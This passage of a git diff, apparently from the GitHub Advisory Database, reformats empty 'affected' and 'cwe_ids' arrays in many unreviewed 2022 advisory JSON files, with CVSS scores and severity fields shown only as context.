"type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-xmxp-x783-v5rx/GHSA-xmxp-x783-v5rx.json b/advisories/unreviewed/2022/09/GHSA-xmxp-x783-v5rx/GHSA-xmxp-x783-v5rx.json index 2dcf2126df5..43f4405ec3c 100644 --- a/advisories/unreviewed/2022/09/GHSA-xmxp-x783-v5rx/GHSA-xmxp-x783-v5rx.json +++ b/advisories/unreviewed/2022/09/GHSA-xmxp-x783-v5rx/GHSA-xmxp-x783-v5rx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/10/GHSA-2gvq-92c2-xj2h/GHSA-2gvq-92c2-xj2h.json b/advisories/unreviewed/2022/10/GHSA-2gvq-92c2-xj2h/GHSA-2gvq-92c2-xj2h.json index f15fddc10ad..520ff18b434 100644 --- a/advisories/unreviewed/2022/10/GHSA-2gvq-92c2-xj2h/GHSA-2gvq-92c2-xj2h.json +++ b/advisories/unreviewed/2022/10/GHSA-2gvq-92c2-xj2h/GHSA-2gvq-92c2-xj2h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-2hj8-q57r-32v5/GHSA-2hj8-q57r-32v5.json b/advisories/unreviewed/2022/10/GHSA-2hj8-q57r-32v5/GHSA-2hj8-q57r-32v5.json index 24ff0524494..3ba98fd2ec9 100644 --- a/advisories/unreviewed/2022/10/GHSA-2hj8-q57r-32v5/GHSA-2hj8-q57r-32v5.json +++ b/advisories/unreviewed/2022/10/GHSA-2hj8-q57r-32v5/GHSA-2hj8-q57r-32v5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-3j3c-w82w-2cmg/GHSA-3j3c-w82w-2cmg.json b/advisories/unreviewed/2022/10/GHSA-3j3c-w82w-2cmg/GHSA-3j3c-w82w-2cmg.json index 77091ed2e71..df5307a03c3 100644 --- a/advisories/unreviewed/2022/10/GHSA-3j3c-w82w-2cmg/GHSA-3j3c-w82w-2cmg.json +++ b/advisories/unreviewed/2022/10/GHSA-3j3c-w82w-2cmg/GHSA-3j3c-w82w-2cmg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/10/GHSA-5cp7-rvwq-5jc9/GHSA-5cp7-rvwq-5jc9.json b/advisories/unreviewed/2022/10/GHSA-5cp7-rvwq-5jc9/GHSA-5cp7-rvwq-5jc9.json index 49517119dc3..40317348012 100644 --- a/advisories/unreviewed/2022/10/GHSA-5cp7-rvwq-5jc9/GHSA-5cp7-rvwq-5jc9.json +++ b/advisories/unreviewed/2022/10/GHSA-5cp7-rvwq-5jc9/GHSA-5cp7-rvwq-5jc9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/10/GHSA-5m5q-gvxw-j824/GHSA-5m5q-gvxw-j824.json b/advisories/unreviewed/2022/10/GHSA-5m5q-gvxw-j824/GHSA-5m5q-gvxw-j824.json index 0b22f4ff90c..c791fd30a12 100644 --- a/advisories/unreviewed/2022/10/GHSA-5m5q-gvxw-j824/GHSA-5m5q-gvxw-j824.json +++ b/advisories/unreviewed/2022/10/GHSA-5m5q-gvxw-j824/GHSA-5m5q-gvxw-j824.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-5vwr-9c6v-pxf7/GHSA-5vwr-9c6v-pxf7.json b/advisories/unreviewed/2022/10/GHSA-5vwr-9c6v-pxf7/GHSA-5vwr-9c6v-pxf7.json index 0dba658cb1f..9b0e963c0f4 100644 --- a/advisories/unreviewed/2022/10/GHSA-5vwr-9c6v-pxf7/GHSA-5vwr-9c6v-pxf7.json +++ b/advisories/unreviewed/2022/10/GHSA-5vwr-9c6v-pxf7/GHSA-5vwr-9c6v-pxf7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-6grf-r8pm-7j2p/GHSA-6grf-r8pm-7j2p.json b/advisories/unreviewed/2022/10/GHSA-6grf-r8pm-7j2p/GHSA-6grf-r8pm-7j2p.json index 935c91c64e1..2bdff5366e5 100644 --- a/advisories/unreviewed/2022/10/GHSA-6grf-r8pm-7j2p/GHSA-6grf-r8pm-7j2p.json +++ b/advisories/unreviewed/2022/10/GHSA-6grf-r8pm-7j2p/GHSA-6grf-r8pm-7j2p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-74xp-vm35-rpjw/GHSA-74xp-vm35-rpjw.json b/advisories/unreviewed/2022/10/GHSA-74xp-vm35-rpjw/GHSA-74xp-vm35-rpjw.json index 0c467c56d96..8d359bdca6b 100644 --- a/advisories/unreviewed/2022/10/GHSA-74xp-vm35-rpjw/GHSA-74xp-vm35-rpjw.json +++ b/advisories/unreviewed/2022/10/GHSA-74xp-vm35-rpjw/GHSA-74xp-vm35-rpjw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/10/GHSA-75qr-7cf6-c5qr/GHSA-75qr-7cf6-c5qr.json b/advisories/unreviewed/2022/10/GHSA-75qr-7cf6-c5qr/GHSA-75qr-7cf6-c5qr.json index 66daf9a643f..5f0999d799a 100644 --- a/advisories/unreviewed/2022/10/GHSA-75qr-7cf6-c5qr/GHSA-75qr-7cf6-c5qr.json +++ b/advisories/unreviewed/2022/10/GHSA-75qr-7cf6-c5qr/GHSA-75qr-7cf6-c5qr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-7h2x-hwcf-f9q6/GHSA-7h2x-hwcf-f9q6.json b/advisories/unreviewed/2022/10/GHSA-7h2x-hwcf-f9q6/GHSA-7h2x-hwcf-f9q6.json index 4afa17e11c4..298bd5490fa 100644 --- a/advisories/unreviewed/2022/10/GHSA-7h2x-hwcf-f9q6/GHSA-7h2x-hwcf-f9q6.json +++ b/advisories/unreviewed/2022/10/GHSA-7h2x-hwcf-f9q6/GHSA-7h2x-hwcf-f9q6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-8c7h-vcff-vfxq/GHSA-8c7h-vcff-vfxq.json b/advisories/unreviewed/2022/10/GHSA-8c7h-vcff-vfxq/GHSA-8c7h-vcff-vfxq.json index 7e8e52d7d64..c34b810c747 100644 --- a/advisories/unreviewed/2022/10/GHSA-8c7h-vcff-vfxq/GHSA-8c7h-vcff-vfxq.json +++ b/advisories/unreviewed/2022/10/GHSA-8c7h-vcff-vfxq/GHSA-8c7h-vcff-vfxq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-cw5v-hvcg-5fxq/GHSA-cw5v-hvcg-5fxq.json b/advisories/unreviewed/2022/10/GHSA-cw5v-hvcg-5fxq/GHSA-cw5v-hvcg-5fxq.json index cc1f6328661..1f35f043c66 100644 --- a/advisories/unreviewed/2022/10/GHSA-cw5v-hvcg-5fxq/GHSA-cw5v-hvcg-5fxq.json +++ b/advisories/unreviewed/2022/10/GHSA-cw5v-hvcg-5fxq/GHSA-cw5v-hvcg-5fxq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-fj59-pgc7-7mf2/GHSA-fj59-pgc7-7mf2.json b/advisories/unreviewed/2022/10/GHSA-fj59-pgc7-7mf2/GHSA-fj59-pgc7-7mf2.json index b24758d37a7..61c9ab2a611 100644 --- a/advisories/unreviewed/2022/10/GHSA-fj59-pgc7-7mf2/GHSA-fj59-pgc7-7mf2.json +++ b/advisories/unreviewed/2022/10/GHSA-fj59-pgc7-7mf2/GHSA-fj59-pgc7-7mf2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-h54w-qqq6-jp69/GHSA-h54w-qqq6-jp69.json b/advisories/unreviewed/2022/10/GHSA-h54w-qqq6-jp69/GHSA-h54w-qqq6-jp69.json index 6e17ab6b8fd..c782051182c 100644 --- a/advisories/unreviewed/2022/10/GHSA-h54w-qqq6-jp69/GHSA-h54w-qqq6-jp69.json +++ b/advisories/unreviewed/2022/10/GHSA-h54w-qqq6-jp69/GHSA-h54w-qqq6-jp69.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/10/GHSA-hxm2-wc54-rc7x/GHSA-hxm2-wc54-rc7x.json b/advisories/unreviewed/2022/10/GHSA-hxm2-wc54-rc7x/GHSA-hxm2-wc54-rc7x.json index 835d0159855..7b87ecce74c 100644 --- a/advisories/unreviewed/2022/10/GHSA-hxm2-wc54-rc7x/GHSA-hxm2-wc54-rc7x.json +++ b/advisories/unreviewed/2022/10/GHSA-hxm2-wc54-rc7x/GHSA-hxm2-wc54-rc7x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-j8m4-m9gj-6wrm/GHSA-j8m4-m9gj-6wrm.json b/advisories/unreviewed/2022/10/GHSA-j8m4-m9gj-6wrm/GHSA-j8m4-m9gj-6wrm.json index 6047a7d0b47..ce803d03519 100644 --- a/advisories/unreviewed/2022/10/GHSA-j8m4-m9gj-6wrm/GHSA-j8m4-m9gj-6wrm.json +++ b/advisories/unreviewed/2022/10/GHSA-j8m4-m9gj-6wrm/GHSA-j8m4-m9gj-6wrm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/10/GHSA-qqc4-r6pr-hvwj/GHSA-qqc4-r6pr-hvwj.json b/advisories/unreviewed/2022/10/GHSA-qqc4-r6pr-hvwj/GHSA-qqc4-r6pr-hvwj.json index 7022fa9b734..6e31c2fc740 100644 --- a/advisories/unreviewed/2022/10/GHSA-qqc4-r6pr-hvwj/GHSA-qqc4-r6pr-hvwj.json +++ b/advisories/unreviewed/2022/10/GHSA-qqc4-r6pr-hvwj/GHSA-qqc4-r6pr-hvwj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-r2w6-f5cp-rrh7/GHSA-r2w6-f5cp-rrh7.json b/advisories/unreviewed/2022/10/GHSA-r2w6-f5cp-rrh7/GHSA-r2w6-f5cp-rrh7.json index 078f580be0b..5ebc5b9cdad 100644 --- a/advisories/unreviewed/2022/10/GHSA-r2w6-f5cp-rrh7/GHSA-r2w6-f5cp-rrh7.json +++ b/advisories/unreviewed/2022/10/GHSA-r2w6-f5cp-rrh7/GHSA-r2w6-f5cp-rrh7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/10/GHSA-rx5q-gxfx-g59w/GHSA-rx5q-gxfx-g59w.json b/advisories/unreviewed/2022/10/GHSA-rx5q-gxfx-g59w/GHSA-rx5q-gxfx-g59w.json index 9803c5a70e5..ac85794041f 100644 --- a/advisories/unreviewed/2022/10/GHSA-rx5q-gxfx-g59w/GHSA-rx5q-gxfx-g59w.json +++ b/advisories/unreviewed/2022/10/GHSA-rx5q-gxfx-g59w/GHSA-rx5q-gxfx-g59w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/10/GHSA-wwx5-rp7h-xc6x/GHSA-wwx5-rp7h-xc6x.json b/advisories/unreviewed/2022/10/GHSA-wwx5-rp7h-xc6x/GHSA-wwx5-rp7h-xc6x.json index 700be2ea502..ce76a64e41f 100644 --- a/advisories/unreviewed/2022/10/GHSA-wwx5-rp7h-xc6x/GHSA-wwx5-rp7h-xc6x.json +++ b/advisories/unreviewed/2022/10/GHSA-wwx5-rp7h-xc6x/GHSA-wwx5-rp7h-xc6x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-2373-h4hh-88wg/GHSA-2373-h4hh-88wg.json b/advisories/unreviewed/2022/11/GHSA-2373-h4hh-88wg/GHSA-2373-h4hh-88wg.json index 382f47d5c74..16cef46a6aa 100644 --- a/advisories/unreviewed/2022/11/GHSA-2373-h4hh-88wg/GHSA-2373-h4hh-88wg.json +++ b/advisories/unreviewed/2022/11/GHSA-2373-h4hh-88wg/GHSA-2373-h4hh-88wg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-255v-ffqg-5w87/GHSA-255v-ffqg-5w87.json b/advisories/unreviewed/2022/11/GHSA-255v-ffqg-5w87/GHSA-255v-ffqg-5w87.json index 53894b9d536..30c655d2c64 100644 --- a/advisories/unreviewed/2022/11/GHSA-255v-ffqg-5w87/GHSA-255v-ffqg-5w87.json +++ b/advisories/unreviewed/2022/11/GHSA-255v-ffqg-5w87/GHSA-255v-ffqg-5w87.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-2hvq-vmfm-c497/GHSA-2hvq-vmfm-c497.json b/advisories/unreviewed/2022/11/GHSA-2hvq-vmfm-c497/GHSA-2hvq-vmfm-c497.json index 7e7de61cec6..fee022effbd 100644 --- a/advisories/unreviewed/2022/11/GHSA-2hvq-vmfm-c497/GHSA-2hvq-vmfm-c497.json +++ b/advisories/unreviewed/2022/11/GHSA-2hvq-vmfm-c497/GHSA-2hvq-vmfm-c497.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-2xff-x5qw-v6m5/GHSA-2xff-x5qw-v6m5.json b/advisories/unreviewed/2022/11/GHSA-2xff-x5qw-v6m5/GHSA-2xff-x5qw-v6m5.json index fbdc5f0d3e0..b23079d7b85 100644 --- a/advisories/unreviewed/2022/11/GHSA-2xff-x5qw-v6m5/GHSA-2xff-x5qw-v6m5.json +++ b/advisories/unreviewed/2022/11/GHSA-2xff-x5qw-v6m5/GHSA-2xff-x5qw-v6m5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-3522-8qwx-4h39/GHSA-3522-8qwx-4h39.json b/advisories/unreviewed/2022/11/GHSA-3522-8qwx-4h39/GHSA-3522-8qwx-4h39.json index 00b57b9f683..720f8f645ba 100644 --- a/advisories/unreviewed/2022/11/GHSA-3522-8qwx-4h39/GHSA-3522-8qwx-4h39.json +++ b/advisories/unreviewed/2022/11/GHSA-3522-8qwx-4h39/GHSA-3522-8qwx-4h39.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-3697-9w4g-6gpf/GHSA-3697-9w4g-6gpf.json b/advisories/unreviewed/2022/11/GHSA-3697-9w4g-6gpf/GHSA-3697-9w4g-6gpf.json index e3b8eecdf61..ff8f920dd2e 100644 --- a/advisories/unreviewed/2022/11/GHSA-3697-9w4g-6gpf/GHSA-3697-9w4g-6gpf.json +++ b/advisories/unreviewed/2022/11/GHSA-3697-9w4g-6gpf/GHSA-3697-9w4g-6gpf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-36h6-cr3x-fx7f/GHSA-36h6-cr3x-fx7f.json b/advisories/unreviewed/2022/11/GHSA-36h6-cr3x-fx7f/GHSA-36h6-cr3x-fx7f.json index 8bc29e94b3a..55d1624d27b 100644 --- a/advisories/unreviewed/2022/11/GHSA-36h6-cr3x-fx7f/GHSA-36h6-cr3x-fx7f.json +++ b/advisories/unreviewed/2022/11/GHSA-36h6-cr3x-fx7f/GHSA-36h6-cr3x-fx7f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-378q-gq6q-wjhh/GHSA-378q-gq6q-wjhh.json b/advisories/unreviewed/2022/11/GHSA-378q-gq6q-wjhh/GHSA-378q-gq6q-wjhh.json index bdc2aa684ed..d149843faa4 100644 --- a/advisories/unreviewed/2022/11/GHSA-378q-gq6q-wjhh/GHSA-378q-gq6q-wjhh.json +++ b/advisories/unreviewed/2022/11/GHSA-378q-gq6q-wjhh/GHSA-378q-gq6q-wjhh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-3v7v-46v6-pjjr/GHSA-3v7v-46v6-pjjr.json b/advisories/unreviewed/2022/11/GHSA-3v7v-46v6-pjjr/GHSA-3v7v-46v6-pjjr.json index 05f20f67d5d..049ed54fff2 100644 --- a/advisories/unreviewed/2022/11/GHSA-3v7v-46v6-pjjr/GHSA-3v7v-46v6-pjjr.json +++ b/advisories/unreviewed/2022/11/GHSA-3v7v-46v6-pjjr/GHSA-3v7v-46v6-pjjr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-3v85-hh9x-mfgc/GHSA-3v85-hh9x-mfgc.json b/advisories/unreviewed/2022/11/GHSA-3v85-hh9x-mfgc/GHSA-3v85-hh9x-mfgc.json index 67035898fdd..199a9452a9a 100644 --- a/advisories/unreviewed/2022/11/GHSA-3v85-hh9x-mfgc/GHSA-3v85-hh9x-mfgc.json +++ b/advisories/unreviewed/2022/11/GHSA-3v85-hh9x-mfgc/GHSA-3v85-hh9x-mfgc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-482m-76pm-28gj/GHSA-482m-76pm-28gj.json b/advisories/unreviewed/2022/11/GHSA-482m-76pm-28gj/GHSA-482m-76pm-28gj.json index 40cdec4d276..05c9fd4d30f 100644 --- a/advisories/unreviewed/2022/11/GHSA-482m-76pm-28gj/GHSA-482m-76pm-28gj.json +++ b/advisories/unreviewed/2022/11/GHSA-482m-76pm-28gj/GHSA-482m-76pm-28gj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-48r2-355w-7xxg/GHSA-48r2-355w-7xxg.json b/advisories/unreviewed/2022/11/GHSA-48r2-355w-7xxg/GHSA-48r2-355w-7xxg.json index c5148c4ab96..7f801275e55 100644 --- a/advisories/unreviewed/2022/11/GHSA-48r2-355w-7xxg/GHSA-48r2-355w-7xxg.json +++ b/advisories/unreviewed/2022/11/GHSA-48r2-355w-7xxg/GHSA-48r2-355w-7xxg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-4pr5-h4qv-336x/GHSA-4pr5-h4qv-336x.json b/advisories/unreviewed/2022/11/GHSA-4pr5-h4qv-336x/GHSA-4pr5-h4qv-336x.json index 497869e48fc..c832df96a8c 100644 --- a/advisories/unreviewed/2022/11/GHSA-4pr5-h4qv-336x/GHSA-4pr5-h4qv-336x.json +++ b/advisories/unreviewed/2022/11/GHSA-4pr5-h4qv-336x/GHSA-4pr5-h4qv-336x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-4w5x-gxff-8vr4/GHSA-4w5x-gxff-8vr4.json b/advisories/unreviewed/2022/11/GHSA-4w5x-gxff-8vr4/GHSA-4w5x-gxff-8vr4.json index 6d08afb5d59..85a097af2f6 100644 --- a/advisories/unreviewed/2022/11/GHSA-4w5x-gxff-8vr4/GHSA-4w5x-gxff-8vr4.json +++ b/advisories/unreviewed/2022/11/GHSA-4w5x-gxff-8vr4/GHSA-4w5x-gxff-8vr4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-53cf-5qp4-7jrr/GHSA-53cf-5qp4-7jrr.json b/advisories/unreviewed/2022/11/GHSA-53cf-5qp4-7jrr/GHSA-53cf-5qp4-7jrr.json index c077f81ffaa..0f4d1d558a8 100644 --- a/advisories/unreviewed/2022/11/GHSA-53cf-5qp4-7jrr/GHSA-53cf-5qp4-7jrr.json +++ b/advisories/unreviewed/2022/11/GHSA-53cf-5qp4-7jrr/GHSA-53cf-5qp4-7jrr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-54pv-jxwv-8cvv/GHSA-54pv-jxwv-8cvv.json b/advisories/unreviewed/2022/11/GHSA-54pv-jxwv-8cvv/GHSA-54pv-jxwv-8cvv.json index 956841454a5..209586ccb53 100644 --- a/advisories/unreviewed/2022/11/GHSA-54pv-jxwv-8cvv/GHSA-54pv-jxwv-8cvv.json +++ b/advisories/unreviewed/2022/11/GHSA-54pv-jxwv-8cvv/GHSA-54pv-jxwv-8cvv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-6gcw-xxjf-q6rm/GHSA-6gcw-xxjf-q6rm.json b/advisories/unreviewed/2022/11/GHSA-6gcw-xxjf-q6rm/GHSA-6gcw-xxjf-q6rm.json index 3bf41f97775..22427f90f79 100644 --- a/advisories/unreviewed/2022/11/GHSA-6gcw-xxjf-q6rm/GHSA-6gcw-xxjf-q6rm.json +++ 